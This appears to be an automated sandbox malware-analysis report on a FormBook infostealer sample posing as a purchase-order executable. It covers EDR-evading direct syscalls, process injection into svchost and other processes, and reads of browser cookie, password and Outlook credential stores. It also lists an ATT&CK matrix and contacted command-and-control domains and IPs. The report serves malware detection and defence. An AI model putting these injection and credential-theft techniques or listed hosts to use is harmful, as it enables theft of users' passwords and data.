            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001709D5 SetUnhandledExceptionFilter,0_2_001709D5
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00170C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00170C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread register set: target process: 6432Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread APC queued: target process: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E61008Jump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001B1201
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00192BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00192BA5
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BB226 SendInput,keybd_event,0_2_001BB226
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001D22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001D22DA
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001B0B62
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001B1663
            Source: PO2-2401-0016 (TR).exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: PO2-2401-0016 (TR).exe, WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00170698 cpuid 0_2_00170698
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_001C8195
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001AD27A GetUserNameW,0_2_001AD27A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0018B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0018B952
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001542DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_81
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_XP
            Source: PO2-2401-0016 (TR).exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_XPe
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_VISTA
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_7
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001D1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_001D1204
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001D1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_001D1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511724 Sample: PO2-2401-0016 (TR).exe Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 28 www.kckartal.xyz 2->28 30 www.golbasi-nakliyat.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 7 other signatures 2->50 10 PO2-2401-0016 (TR).exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 WwOlfblnYaWmLq.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RMActivate_ssp.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 WwOlfblnYaWmLq.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.quilo.life 203.161.43.228, 58662, 58663, 58664 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 mfgamecompany.shop 185.173.111.76, 58658, 58659, 58660 TERRATRANSIT-ASDE Germany 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO2-2401-0016 (TR).exe48%VirustotalBrowse
            PO2-2401-0016 (TR).exe50%ReversingLabsWin32.Trojan.Leonem
            PO2-2401-0016 (TR).exe100%AviraDR/AutoIt.Gen8
            PO2-2401-0016 (TR).exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            bola88site.one0%VirustotalBrowse
            freepicture.online1%VirustotalBrowse
            070001350.xyz0%VirustotalBrowse
            www.groet.online1%VirustotalBrowse
            www.capbear.net0%VirustotalBrowse
            hm62t.top2%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.726075.buzz1%VirustotalBrowse
            www.qiluqiyuan.buzz1%VirustotalBrowse
            www.golbasi-nakliyat.xyz1%VirustotalBrowse
            www.mfgamecompany.shop0%VirustotalBrowse
            www.freepicture.online1%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
